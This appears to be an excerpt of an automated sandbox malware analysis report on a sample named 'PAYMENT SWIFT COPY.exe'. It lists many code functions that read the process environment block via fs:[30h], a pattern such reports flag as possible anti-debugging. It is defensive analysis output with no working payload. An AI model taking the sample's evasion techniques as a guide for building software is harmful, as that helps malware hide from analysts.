                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01908402 mov eax, dword ptr fs:[00000030h]8_2_01908402
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01908402 mov eax, dword ptr fs:[00000030h]8_2_01908402
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01908402 mov eax, dword ptr fs:[00000030h]8_2_01908402
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CC427 mov eax, dword ptr fs:[00000030h]8_2_018CC427
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CE420 mov eax, dword ptr fs:[00000030h]8_2_018CE420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CE420 mov eax, dword ptr fs:[00000030h]8_2_018CE420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CE420 mov eax, dword ptr fs:[00000030h]8_2_018CE420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956420 mov eax, dword ptr fs:[00000030h]8_2_01956420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956420 mov eax, dword ptr fs:[00000030h]8_2_01956420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956420 mov eax, dword ptr fs:[00000030h]8_2_01956420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956420 mov eax, dword ptr fs:[00000030h]8_2_01956420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956420 mov eax, dword ptr fs:[00000030h]8_2_01956420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956420 mov eax, dword ptr fs:[00000030h]8_2_01956420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956420 mov eax, dword ptr fs:[00000030h]8_2_01956420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0198A456 mov eax, dword ptr fs:[00000030h]8_2_0198A456
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018C645D mov eax, dword ptr fs:[00000030h]8_2_018C645D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F245A mov eax, dword ptr fs:[00000030h]8_2_018F245A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195C460 mov ecx, dword ptr fs:[00000030h]8_2_0195C460
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FA470 mov eax, dword ptr fs:[00000030h]8_2_018FA470
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FA470 mov eax, dword ptr fs:[00000030h]8_2_018FA470
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FA470 mov eax, dword ptr fs:[00000030h]8_2_018FA470
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197678E mov eax, dword ptr fs:[00000030h]8_2_0197678E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D07AF mov eax, dword ptr fs:[00000030h]8_2_018D07AF
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019847A0 mov eax, dword ptr fs:[00000030h]8_2_019847A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DC7C0 mov eax, dword ptr fs:[00000030h]8_2_018DC7C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019507C3 mov eax, dword ptr fs:[00000030h]8_2_019507C3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F27ED mov eax, dword ptr fs:[00000030h]8_2_018F27ED
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F27ED mov eax, dword ptr fs:[00000030h]8_2_018F27ED
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F27ED mov eax, dword ptr fs:[00000030h]8_2_018F27ED
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195E7E1 mov eax, dword ptr fs:[00000030h]8_2_0195E7E1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D47FB mov eax, dword ptr fs:[00000030h]8_2_018D47FB
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D47FB mov eax, dword ptr fs:[00000030h]8_2_018D47FB
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01900710 mov eax, dword ptr fs:[00000030h]8_2_01900710
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190C700 mov eax, dword ptr fs:[00000030h]8_2_0190C700
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D0710 mov eax, dword ptr fs:[00000030h]8_2_018D0710
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194C730 mov eax, dword ptr fs:[00000030h]8_2_0194C730
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190273C mov eax, dword ptr fs:[00000030h]8_2_0190273C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190273C mov ecx, dword ptr fs:[00000030h]8_2_0190273C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190273C mov eax, dword ptr fs:[00000030h]8_2_0190273C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190C720 mov eax, dword ptr fs:[00000030h]8_2_0190C720
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190C720 mov eax, dword ptr fs:[00000030h]8_2_0190C720
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01954755 mov eax, dword ptr fs:[00000030h]8_2_01954755
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912750 mov eax, dword ptr fs:[00000030h]8_2_01912750
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912750 mov eax, dword ptr fs:[00000030h]8_2_01912750
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195E75D mov eax, dword ptr fs:[00000030h]8_2_0195E75D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D0750 mov eax, dword ptr fs:[00000030h]8_2_018D0750
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190674D mov esi, dword ptr fs:[00000030h]8_2_0190674D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190674D mov eax, dword ptr fs:[00000030h]8_2_0190674D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190674D mov eax, dword ptr fs:[00000030h]8_2_0190674D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D8770 mov eax, dword ptr fs:[00000030h]8_2_018D8770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D4690 mov eax, dword ptr fs:[00000030h]8_2_018D4690
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D4690 mov eax, dword ptr fs:[00000030h]8_2_018D4690
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019066B0 mov eax, dword ptr fs:[00000030h]8_2_019066B0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190C6A6 mov eax, dword ptr fs:[00000030h]8_2_0190C6A6
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0190A6C7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A6C7 mov eax, dword ptr fs:[00000030h]8_2_0190A6C7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019506F1 mov eax, dword ptr fs:[00000030h]8_2_019506F1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019506F1 mov eax, dword ptr fs:[00000030h]8_2_019506F1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E6F2 mov eax, dword ptr fs:[00000030h]8_2_0194E6F2
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E6F2 mov eax, dword ptr fs:[00000030h]8_2_0194E6F2
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E6F2 mov eax, dword ptr fs:[00000030h]8_2_0194E6F2
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E6F2 mov eax, dword ptr fs:[00000030h]8_2_0194E6F2
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E260B mov eax, dword ptr fs:[00000030h]8_2_018E260B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E260B mov eax, dword ptr fs:[00000030h]8_2_018E260B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E260B mov eax, dword ptr fs:[00000030h]8_2_018E260B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E260B mov eax, dword ptr fs:[00000030h]8_2_018E260B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E260B mov eax, dword ptr fs:[00000030h]8_2_018E260B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E260B mov eax, dword ptr fs:[00000030h]8_2_018E260B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E260B mov eax, dword ptr fs:[00000030h]8_2_018E260B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912619 mov eax, dword ptr fs:[00000030h]8_2_01912619
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E609 mov eax, dword ptr fs:[00000030h]8_2_0194E609
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D262C mov eax, dword ptr fs:[00000030h]8_2_018D262C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EE627 mov eax, dword ptr fs:[00000030h]8_2_018EE627
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01906620 mov eax, dword ptr fs:[00000030h]8_2_01906620
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01908620 mov eax, dword ptr fs:[00000030h]8_2_01908620
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EC640 mov eax, dword ptr fs:[00000030h]8_2_018EC640
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01902674 mov eax, dword ptr fs:[00000030h]8_2_01902674
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A660 mov eax, dword ptr fs:[00000030h]8_2_0190A660
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A660 mov eax, dword ptr fs:[00000030h]8_2_0190A660
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199866E mov eax, dword ptr fs:[00000030h]8_2_0199866E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199866E mov eax, dword ptr fs:[00000030h]8_2_0199866E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D09AD mov eax, dword ptr fs:[00000030h]8_2_018D09AD
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D09AD mov eax, dword ptr fs:[00000030h]8_2_018D09AD
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019589B3 mov esi, dword ptr fs:[00000030h]8_2_019589B3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019589B3 mov eax, dword ptr fs:[00000030h]8_2_019589B3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019589B3 mov eax, dword ptr fs:[00000030h]8_2_019589B3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019049D0 mov eax, dword ptr fs:[00000030h]8_2_019049D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199A9D3 mov eax, dword ptr fs:[00000030h]8_2_0199A9D3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019669C0 mov eax, dword ptr fs:[00000030h]8_2_019669C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA9D0 mov eax, dword ptr fs:[00000030h]8_2_018DA9D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA9D0 mov eax, dword ptr fs:[00000030h]8_2_018DA9D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA9D0 mov eax, dword ptr fs:[00000030h]8_2_018DA9D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA9D0 mov eax, dword ptr fs:[00000030h]8_2_018DA9D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA9D0 mov eax, dword ptr fs:[00000030h]8_2_018DA9D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DA9D0 mov eax, dword ptr fs:[00000030h]8_2_018DA9D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019029F9 mov eax, dword ptr fs:[00000030h]8_2_019029F9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019029F9 mov eax, dword ptr fs:[00000030h]8_2_019029F9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195E9E0 mov eax, dword ptr fs:[00000030h]8_2_0195E9E0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195C912 mov eax, dword ptr fs:[00000030h]8_2_0195C912
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018C8918 mov eax, dword ptr fs:[00000030h]8_2_018C8918
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018C8918 mov eax, dword ptr fs:[00000030h]8_2_018C8918
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E908 mov eax, dword ptr fs:[00000030h]8_2_0194E908
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E908 mov eax, dword ptr fs:[00000030h]8_2_0194E908
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0196892B mov eax, dword ptr fs:[00000030h]8_2_0196892B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195892A mov eax, dword ptr fs:[00000030h]8_2_0195892A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01950946 mov eax, dword ptr fs:[00000030h]8_2_01950946
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4940 mov eax, dword ptr fs:[00000030h]8_2_019A4940
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195C97C mov eax, dword ptr fs:[00000030h]8_2_0195C97C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F6962 mov eax, dword ptr fs:[00000030h]8_2_018F6962
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F6962 mov eax, dword ptr fs:[00000030h]8_2_018F6962
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F6962 mov eax, dword ptr fs:[00000030h]8_2_018F6962
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01974978 mov eax, dword ptr fs:[00000030h]8_2_01974978
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01974978 mov eax, dword ptr fs:[00000030h]8_2_01974978
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0191096E mov eax, dword ptr fs:[00000030h]8_2_0191096E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0191096E mov edx, dword ptr fs:[00000030h]8_2_0191096E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0191096E mov eax, dword ptr fs:[00000030h]8_2_0191096E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195C89D mov eax, dword ptr fs:[00000030h]8_2_0195C89D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D0887 mov eax, dword ptr fs:[00000030h]8_2_018D0887
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE8C0 mov eax, dword ptr fs:[00000030h]8_2_018FE8C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A08C0 mov eax, dword ptr fs:[00000030h]8_2_019A08C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190C8F9 mov eax, dword ptr fs:[00000030h]8_2_0190C8F9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190C8F9 mov eax, dword ptr fs:[00000030h]8_2_0190C8F9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199A8E4 mov eax, dword ptr fs:[00000030h]8_2_0199A8E4
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195C810 mov eax, dword ptr fs:[00000030h]8_2_0195C810
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A830 mov eax, dword ptr fs:[00000030h]8_2_0190A830
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197483A mov eax, dword ptr fs:[00000030h]8_2_0197483A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197483A mov eax, dword ptr fs:[00000030h]8_2_0197483A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F2835 mov eax, dword ptr fs:[00000030h]8_2_018F2835
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F2835 mov eax, dword ptr fs:[00000030h]8_2_018F2835
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F2835 mov eax, dword ptr fs:[00000030h]8_2_018F2835
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F2835 mov ecx, dword ptr fs:[00000030h]8_2_018F2835
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F2835 mov eax, dword ptr fs:[00000030h]8_2_018F2835
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F2835 mov eax, dword ptr fs:[00000030h]8_2_018F2835
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01900854 mov eax, dword ptr fs:[00000030h]8_2_01900854
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E2840 mov ecx, dword ptr fs:[00000030h]8_2_018E2840
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D4859 mov eax, dword ptr fs:[00000030h]8_2_018D4859
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D4859 mov eax, dword ptr fs:[00000030h]8_2_018D4859
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01966870 mov eax, dword ptr fs:[00000030h]8_2_01966870
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01966870 mov eax, dword ptr fs:[00000030h]8_2_01966870
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195E872 mov eax, dword ptr fs:[00000030h]8_2_0195E872
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195E872 mov eax, dword ptr fs:[00000030h]8_2_0195E872
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01984BB0 mov eax, dword ptr fs:[00000030h]8_2_01984BB0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01984BB0 mov eax, dword ptr fs:[00000030h]8_2_01984BB0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0BBE mov eax, dword ptr fs:[00000030h]8_2_018E0BBE
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0BBE mov eax, dword ptr fs:[00000030h]8_2_018E0BBE
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D0BCD mov eax, dword ptr fs:[00000030h]8_2_018D0BCD
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D0BCD mov eax, dword ptr fs:[00000030h]8_2_018D0BCD
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D0BCD mov eax, dword ptr fs:[00000030h]8_2_018D0BCD
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F0BCB mov eax, dword ptr fs:[00000030h]8_2_018F0BCB
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F0BCB mov eax, dword ptr fs:[00000030h]8_2_018F0BCB
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F0BCB mov eax, dword ptr fs:[00000030h]8_2_018F0BCB
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197EBD0 mov eax, dword ptr fs:[00000030h]8_2_0197EBD0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195CBF0 mov eax, dword ptr fs:[00000030h]8_2_0195CBF0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FEBFC mov eax, dword ptr fs:[00000030h]8_2_018FEBFC
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D8BF0 mov eax, dword ptr fs:[00000030h]8_2_018D8BF0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D8BF0 mov eax, dword ptr fs:[00000030h]8_2_018D8BF0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D8BF0 mov eax, dword ptr fs:[00000030h]8_2_018D8BF0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h]8_2_0194EB1D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h]8_2_0194EB1D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h]8_2_0194EB1D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h]8_2_0194EB1D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h]8_2_0194EB1D
